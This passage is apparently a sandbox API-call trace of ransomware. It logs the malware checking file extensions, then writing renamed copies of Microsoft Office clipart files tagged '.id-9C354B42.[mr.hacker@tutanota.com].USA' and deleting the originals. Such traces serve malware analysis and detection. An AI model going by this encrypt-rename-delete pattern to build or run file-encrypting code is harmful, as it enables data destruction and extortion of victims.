Office\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf")) returned 1 [0054.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0054.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0054.141] lstrlenW (lpString=".doc") returned 4 [0054.141] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.141] lstrlenW (lpString=".docx") returned 5 [0054.141] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.141] lstrlenW (lpString=".pdf") returned 4 [0054.141] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.141] lstrlenW (lpString=".xls") returned 4 [0054.141] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.141] lstrlenW (lpString=".xlsx") returned 5 [0054.141] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.141] lstrlenW (lpString=".ppt") returned 4 [0054.141] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0054.141] lstrlenW (lpString=".zip") returned 4 [0054.141] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.141] lstrlenW (lpString=".rar") returned 4 [0054.141] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.141] lstrlenW (lpString=".bz2") returned 4 [0054.141] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.141] lstrlenW (lpString=".7z") returned 3 [0054.142] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0054.142] lstrlenW (lpString=".dbf") returned 4 [0054.142] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0054.142] lstrlenW (lpString=".1cd") returned 4 [0054.142] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0054.142] lstrlenW (lpString=".jpg") returned 4 [0054.142] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.145] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.145] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.145] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0054.145] GetLastError () returned 0x0 [0054.145] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xa4c, lpOverlapped=0x0) returned 1 [0054.148] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xa50, lpOverlapped=0x0) returned 1 [0054.149] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.149] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.149] SetEndOfFile (hFile=0x208) returned 1 [0054.149] CloseHandle (hObject=0x208) returned 1 [0054.149] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.149] SetEndOfFile (hFile=0x210) returned 1 [0054.150] CloseHandle (hObject=0x210) returned 1 [0054.150] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.150] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf")) returned 1 [0054.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0054.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0054.151] lstrlenW (lpString=".doc") returned 4 [0054.151] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.151] lstrlenW (lpString=".docx") returned 5 [0054.151] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.151] lstrlenW (lpString=".pdf") returned 4 [0054.151] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.151] lstrlenW (lpString=".xls") returned 4 [0054.151] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.151] lstrlenW (lpString=".xlsx") returned 5 [0054.151] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.151] lstrlenW (lpString=".ppt") returned 4 [0054.151] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0054.151] lstrlenW (lpString=".zip") returned 4 [0054.151] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.151] lstrlenW (lpString=".rar") returned 4 [0054.151] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.151] lstrlenW (lpString=".bz2") returned 4 [0054.151] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.151] lstrlenW (lpString=".7z") returned 3 [0054.151] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0054.151] lstrlenW (lpString=".dbf") returned 4 [0054.151] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0054.151] lstrlenW (lpString=".1cd") returned 4 [0054.151] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0054.152] lstrlenW (lpString=".jpg") returned 4 [0054.152] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.152] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.152] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0054.152] GetLastError () returned 0x0 [0054.152] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x19ec, lpOverlapped=0x0) returned 1 [0054.154] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x19f0, lpOverlapped=0x0) returned 1 [0054.155] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.155] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.155] SetEndOfFile (hFile=0x208) returned 1 [0054.155] CloseHandle (hObject=0x208) returned 1 [0054.155] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.155] SetEndOfFile (hFile=0x210) returned 1 [0054.156] CloseHandle (hObject=0x210) returned 1 [0054.156] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.156] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf")) returned 1 [0054.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0054.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0054.156] lstrlenW (lpString=".doc") returned 4 [0054.156] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.156] lstrlenW (lpString=".docx") returned 5 [0054.156] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.156] lstrlenW (lpString=".pdf") returned 4 [0054.156] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.156] lstrlenW (lpString=".xls") returned 4 [0054.156] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.156] lstrlenW (lpString=".xlsx") returned 5 [0054.156] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.157] lstrlenW (lpString=".ppt") returned 4 [0054.157] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0054.157] lstrlenW (lpString=".zip") returned 4 [0054.157] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.157] lstrlenW (lpString=".rar") returned 4 [0054.157] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.157] lstrlenW (lpString=".bz2") returned 4 [0054.157] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.157] lstrlenW (lpString=".7z") returned 3 [0054.157] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0054.157] lstrlenW (lpString=".dbf") returned 4 [0054.157] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0054.157] lstrlenW (lpString=".1cd") returned 4 [0054.157] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0054.157] lstrlenW (lpString=".jpg") returned 4 [0054.157] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.157] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.157] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0054.158] GetLastError () returned 0x0 [0054.158] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x1204, lpOverlapped=0x0) returned 1 [0054.548] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x1210, lpOverlapped=0x0) returned 1 [0054.564] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.564] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.564] SetEndOfFile (hFile=0x208) returned 1 [0054.565] CloseHandle (hObject=0x208) returned 1 [0054.565] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.565] SetEndOfFile (hFile=0x210) returned 1 [0054.565] CloseHandle (hObject=0x210) returned 1 [0054.566] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.566] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf")) returned 1 [0054.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0054.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0054.566] lstrlenW (lpString=".doc") returned 4 [0054.566] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.566] lstrlenW (lpString=".docx") returned 5 [0054.566] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.566] lstrlenW (lpString=".pdf") returned 4 [0054.566] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.566] lstrlenW (lpString=".xls") returned 4 [0054.566] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.566] lstrlenW (lpString=".xlsx") returned 5 [0054.566] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.566] lstrlenW (lpString=".ppt") returned 4 [0054.566] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0054.567] lstrlenW (lpString=".zip") returned 4 [0054.567] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.567] lstrlenW (lpString=".rar") returned 4 [0054.567] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.567] lstrlenW (lpString=".bz2") returned 4 [0054.567] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.567] lstrlenW (lpString=".7z") returned 3 [0054.567] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0054.567] lstrlenW (lpString=".dbf") returned 4 [0054.567] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0054.567] lstrlenW (lpString=".1cd") returned 4 [0054.567] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63 [0054.567] lstrlenW (lpString=".jpg") returned 4 [0054.567] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.567] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.567] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0054.568] GetLastError () returned 0x0 [0054.568] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x2d74, lpOverlapped=0x0) returned 1 [0054.570] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x2d80, lpOverlapped=0x0) returned 1 [0054.571] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.571] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.571] SetEndOfFile (hFile=0x208) returned 1 [0054.571] CloseHandle (hObject=0x208) returned 1 [0054.571] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.571] SetEndOfFile (hFile=0x210) returned 1 [0054.572] CloseHandle (hObject=0x210) returned 1 [0054.572] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.572] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf")) returned 1 [0054.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0054.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0054.572] lstrlenW (lpString=".doc") returned 4 [0054.572] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.572] lstrlenW (lpString=".docx") returned 5 [0054.572] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.573] lstrlenW (lpString=".pdf") returned 4 [0054.573] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.573] lstrlenW (lpString=".xls") returned 4 [0054.573] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.573] lstrlenW (lpString=".xlsx") returned 5 [0054.573] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.573] lstrlenW (lpString=".ppt") returned 4 [0054.573] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0054.573] lstrlenW (lpString=".zip") returned 4 [0054.573] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.573] lstrlenW (lpString=".rar") returned 4 [0054.573] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.573] lstrlenW (lpString=".bz2") returned 4 [0054.573] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.573] lstrlenW (lpString=".7z") returned 3 [0054.573] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0054.573] lstrlenW (lpString=".dbf") returned 4 [0054.573] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0054.573] lstrlenW (lpString=".1cd") returned 4 [0054.573] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 63 [0054.573] lstrlenW (lpString=".jpg") returned 4 [0054.573] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.574] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=22516) returned 1 [0054.574] CloseHandle (hObject=0x210) returned 1 [0054.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf")) returned 0x20 [0054.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0054.575] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.575] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0054.575] GetLastError () returned 0x0 [0054.575] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x57f4, lpOverlapped=0x0) returned 1 [0054.577] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x5800, lpOverlapped=0x0) returned 1 [0054.578] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.578] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.578] SetEndOfFile (hFile=0x208) returned 1 [0054.578] CloseHandle (hObject=0x208) returned 1 [0054.578] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.578] SetEndOfFile (hFile=0x210) returned 1 [0054.579] CloseHandle (hObject=0x210) returned 1 [0054.579] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.579] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf")) returned 1 [0054.579] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0054.579] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0054.579] lstrlenW (lpString=".doc") returned 4 [0054.579] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.579] lstrlenW (lpString=".docx") returned 5 [0054.579] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.579] lstrlenW (lpString=".pdf") returned 4 [0054.579] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.580] lstrlenW (lpString=".xls") returned 4 [0054.580] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.580] lstrlenW (lpString=".xlsx") returned 5 [0054.580] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.580] lstrlenW (lpString=".ppt") returned 4 [0054.580] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0054.580] lstrlenW (lpString=".zip") returned 4 [0054.580] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 